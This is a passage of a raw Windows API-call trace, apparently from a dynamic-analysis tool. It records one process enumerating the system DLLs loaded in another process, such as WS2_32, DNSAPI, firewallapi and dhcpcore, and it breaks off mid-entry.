[0072.468] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x24b39d8, cb=0x18 | out: lpmodinfo=0x24b39d8*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0072.470] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.470] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0072.471] CoTaskMemFree (pv=0xd956b0) [0072.471] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.471] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0072.473] CoTaskMemFree (pv=0xd956b0) [0072.473] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9c0000, lpmodinfo=0x24b5b98, cb=0x18 | out: lpmodinfo=0x24b5b98*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0072.475] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.475] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9c0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0072.477] CoTaskMemFree (pv=0xd956b0) [0072.477] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.477] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9c0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0072.479] CoTaskMemFree (pv=0xd956b0) [0072.479] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd010000, lpmodinfo=0x24b7d48, cb=0x18 | out: lpmodinfo=0x24b7d48*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0072.481] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.481] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd010000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0072.483] CoTaskMemFree (pv=0xd956b0) [0072.483] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.483] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd010000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0072.485] CoTaskMemFree (pv=0xd956b0) [0072.485] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefca10000, lpmodinfo=0x24b9f08, cb=0x18 | out: lpmodinfo=0x24b9f08*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0072.487] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.487] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefca10000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0072.489] CoTaskMemFree (pv=0xd956b0) [0072.489] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.489] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefca10000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0072.491] CoTaskMemFree (pv=0xd956b0) [0072.491] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd000000, lpmodinfo=0x24bc0d8, cb=0x18 | out: lpmodinfo=0x24bc0d8*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0072.493] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.493] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd000000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0072.495] CoTaskMemFree (pv=0xd956b0) [0072.495] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.495] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd000000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0072.497] CoTaskMemFree (pv=0xd956b0) [0072.497] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb00000, lpmodinfo=0x24be298, cb=0x18 | out: lpmodinfo=0x24be298*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0072.499] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.499] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb00000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0072.501] CoTaskMemFree (pv=0xd956b0) [0072.501] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.501] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb00000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0072.503] CoTaskMemFree (pv=0xd956b0) [0072.503] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb800000, lpmodinfo=0x24c0458, cb=0x18 | out: lpmodinfo=0x24c0458*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0072.505] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.505] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb800000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0072.507] CoTaskMemFree (pv=0xd956b0) [0072.507] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.507] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb800000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0072.509] CoTaskMemFree (pv=0xd956b0) [0072.509] GetModuleInformation (in: hProcess=0x214, hModule=0x7feffae0000, lpmodinfo=0x24c2618, cb=0x18 | out: lpmodinfo=0x24c2618*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0072.511] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.511] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feffae0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0072.514] CoTaskMemFree (pv=0xd956b0) [0072.514] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.514] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feffae0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0072.516] CoTaskMemFree (pv=0xd956b0) [0072.516] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb750000, lpmodinfo=0x24c47d8, cb=0x18 | out: lpmodinfo=0x24c47d8*(lpBaseOfDll=0x7fefb750000, SizeOfImage=0xac000, EntryPoint=0x7fefb766acc)) returned 1 [0072.518] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.518] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb750000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="audiosrv.dll") returned 0xc [0072.520] CoTaskMemFree (pv=0xd956b0) [0072.520] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.520] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb750000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")) returned 0x20 [0072.523] CoTaskMemFree (pv=0xd956b0) [0072.523] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb720000, lpmodinfo=0x24c69c0, cb=0x18 | out: lpmodinfo=0x24c69c0*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0072.525] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.525] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb720000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0072.527] CoTaskMemFree (pv=0xd956b0) [0072.527] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.527] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb720000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0072.530] CoTaskMemFree (pv=0xd956b0) [0072.530] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdc80000, lpmodinfo=0x24c8b90, cb=0x18 | out: lpmodinfo=0x24c8b90*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0072.532] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.532] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdc80000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0072.534] CoTaskMemFree (pv=0xd956b0) [0072.534] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.534] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdc80000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0072.536] CoTaskMemFree (pv=0xd956b0) [0072.537] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9a0000, lpmodinfo=0x24cad60, cb=0x18 | out: lpmodinfo=0x24cad60*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0072.539] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.539] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0072.541] CoTaskMemFree (pv=0xd956b0) [0072.541] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.541] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0072.544] CoTaskMemFree (pv=0xd956b0) [0072.544] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdf90000, lpmodinfo=0x24cd148, cb=0x18 | out: lpmodinfo=0x24cd148*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0072.546] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.546] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdf90000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0072.549] CoTaskMemFree (pv=0xd956b0) [0072.549] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.549] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdf90000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0072.551] CoTaskMemFree (pv=0xd956b0) [0072.551] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd980000, lpmodinfo=0x24cf318, cb=0x18 | out: lpmodinfo=0x24cf318*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0072.554] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.554] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd980000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0072.556] CoTaskMemFree (pv=0xd956b0) [0072.556] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.556] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd980000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0072.559] CoTaskMemFree (pv=0xd956b0) [0072.559] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbcc0000, lpmodinfo=0x24d14d8, cb=0x18 | out: lpmodinfo=0x24d14d8*(lpBaseOfDll=0x7fefbcc0000, SizeOfImage=0x4b000, EntryPoint=0x7fefbccefcc)) returned 1 [0072.561] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.561] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbcc0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="MMDevAPI.DLL") returned 0xc [0072.564] CoTaskMemFree (pv=0xd956b0) [0072.564] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.564] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbcc0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\MMDevAPI.DLL" (normalized: "c:\\windows\\system32\\mmdevapi.dll")) returned 0x20 [0072.567] CoTaskMemFree (pv=0xd956b0) [0072.567] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc130000, lpmodinfo=0x24d36a8, cb=0x18 | out: lpmodinfo=0x24d36a8*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0072.569] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.569] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc130000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0072.572] CoTaskMemFree (pv=0xd956b0) [0072.572] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.572] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc130000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0072.575] CoTaskMemFree (pv=0xd956b0) [0072.575] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb710000, lpmodinfo=0x24d5868, cb=0x18 | out: lpmodinfo=0x24d5868*(lpBaseOfDll=0x7fefb710000, SizeOfImage=0x9000, EntryPoint=0x7fefb711010)) returned 1 [0072.577] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.577] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb710000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="AVRT.dll") returned 0x8 [0072.580] CoTaskMemFree (pv=0xd956b0) [0072.580] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.580] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb710000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AVRT.dll" (normalized: "c:\\windows\\system32\\avrt.dll")) returned 0x1c [0072.583] CoTaskMemFree (pv=0xd956b0) [0072.583] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff360000, lpmodinfo=0x24d7a28, cb=0x18 | out: lpmodinfo=0x24d7a28*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0072.586] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.586] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff360000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0072.588] CoTaskMemFree (pv=0xd956b0) [0072.588] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.588] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff360000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0072.591] CoTaskMemFree (pv=0xd956b0) [0072.591] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd720000, lpmodinfo=0x24d9be8, cb=0x18 | out: lpmodinfo=0x24d9be8*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0072.594] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.594] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd720000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0072.597] CoTaskMemFree (pv=0xd956b0) [0072.597] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.597] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd720000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0072.600] CoTaskMemFree (pv=0xd956b0) [0072.600] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefada0000, lpmodinfo=0x24dbda8, cb=0x18 | out: lpmodinfo=0x24dbda8*(lpBaseOfDll=0x7fefada0000, SizeOfImage=0xa000, EntryPoint=0x7fefada1adc)) returned 1 [0072.602] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.602] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefada0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="lmhsvc.dll") returned 0xa [0072.606] CoTaskMemFree (pv=0xd956b0) [0072.606] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.606] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefada0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll")) returned 0x1e [0072.609] CoTaskMemFree (pv=0xd956b0) [0072.609] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb270000, lpmodinfo=0x24ddf68, cb=0x18 | out: lpmodinfo=0x24ddf68*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0072.612] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.612] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb270000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0072.615] CoTaskMemFree (pv=0xd956b0) [0072.615] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.615] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb270000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0072.618] CoTaskMemFree (pv=0xd956b0) [0072.618] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb260000, lpmodinfo=0x24e0138, cb=0x18 | out: lpmodinfo=0x24e0138*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0072.623] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.623] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb260000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0072.626] CoTaskMemFree (pv=0xd956b0) [0072.626] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.626] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb260000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0072.629] CoTaskMemFree (pv=0xd956b0) [0072.629] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefad90000, lpmodinfo=0x24e22f8, cb=0x18 | out: lpmodinfo=0x24e22f8*(lpBaseOfDll=0x7fefad90000, SizeOfImage=0x8000, EntryPoint=0x7fefad9284c)) returned 1 [0072.632] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.632] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefad90000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="nrpsrv.DLL") returned 0xa [0072.635] CoTaskMemFree (pv=0xd956b0) [0072.635] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.635] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefad90000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\nrpsrv.DLL" (normalized: "c:\\windows\\system32\\nrpsrv.dll")) returned 0x1e [0072.638] CoTaskMemFree (pv=0xd956b0) [0072.639] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefad20000, lpmodinfo=0x24e44b8, cb=0x18 | out: lpmodinfo=0x24e44b8*(lpBaseOfDll=0x7fefad20000, SizeOfImage=0x51000, EntryPoint=0x7fefad2f6c0)) returned 1 [0072.642] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.642] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefad20000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="dhcpcore.dll") returned 0xc [0072.645] CoTaskMemFree (pv=0xd956b0) [0072.645] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.645] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefad20000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll")) returned 0x20 [0072.648] CoTaskMemFree (pv=0xd956b0) [0072.648] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefce90000, lpmodinfo=0x24e6688, cb=0x18 | out: lpmodinfo=0x24e6688*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0072.651] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.651] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefce90000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0072.656] CoTaskMemFree (pv=0xd956b0) [0072.656] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.656] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefce90000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0072.659] CoTaskMemFree (pv=0xd956b0) [0072.659] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc950000, lpmodinfo=0x24e8848, cb=0x18 | out: lpmodinfo=0x24e8848*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0072.662] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.662] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc950000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="firewallapi.dll") returned 0xf [0072.666] CoTaskMemFree (pv=0xd956b0) [0072.666] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.666] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc950000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\firewallapi.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0072.669] CoTaskMemFree (pv=0xd956b0) [0072.669] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc940000, lpmodinfo=0x24eaa30, cb=0x18 | out: lpmodinfo=0x24eaa30*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0072.672] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.672] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc940000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0072.675] CoTaskMemFree (pv=0xd956b0) [0072.675] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.675] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc940000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0072.679] CoTaskMemFree (pv=0xd956b0) [0072.679] GetModuleInformation (in: hProcess=0x214, hModule=0x7feface0000, lpmodinfo=0x24ecbf0, cb=0x18 | out: lpmodinfo=0x24ecbf0*(lpBaseOfDll=0x7feface0000, SizeOfImage=0x3b000, EntryPoint=0x7feface4520)) returned 1 [0072.682] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.682] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feface0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="dhcpcore6.dll") returned 0xd [0072.685] CoTaskMemFree (pv=0xd956b0) [0072.685] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.685] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feface0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll")) returned 0x21 [0072.688] CoTaskMemFree (pv=0xd956b0) [0072.688] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb3f0000, lpmodinfo=0x24eedc0, cb=0x18 | out: lpmodinfo=0x24eedc0*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0072.692] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.692] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb3f0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="NLAapi.dll") returned 0xa [0072.695] CoTaskMemFree (pv=0xd956b0) [0072.695] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.695] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb3f0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NLAapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0072.698] CoTaskMemFree (pv=0xd956b0) [0072.698] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9160000, lpmodinfo=0x24f0f80, cb=0x18 | out: lpmodinfo=0x24f0f80*(lpBaseOfDll=0x7fef9160000, SizeOfImage=0x15000, EntryPoint=0x7fef91612a0)) returned 1 [0072.702] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9160000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="napinsp.dll") returned 0xb [0072.705] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9160000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\napinsp.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")) returned 0x1f [0072.708] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9180000, lpmodinfo=0x24f3140, cb=0x18 | out: lpmodinfo=0x24f3140*(lpBaseOfDll=0x7fef9180000, SizeOfImage=0x19000, EntryPoint=0x7fef918177c)) returned 1 [0072.712] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9180000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="pnrpnsp.dll") returned 0xb [0072.715] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9180000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")) returned 0x1f [0072.718] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac50000, lpmodinfo=0x24f5300, cb=0x18 | out: lpmodinfo=0x24f5300*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0072.722] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac50000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0072.725] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac50000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0072.729] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9530000, 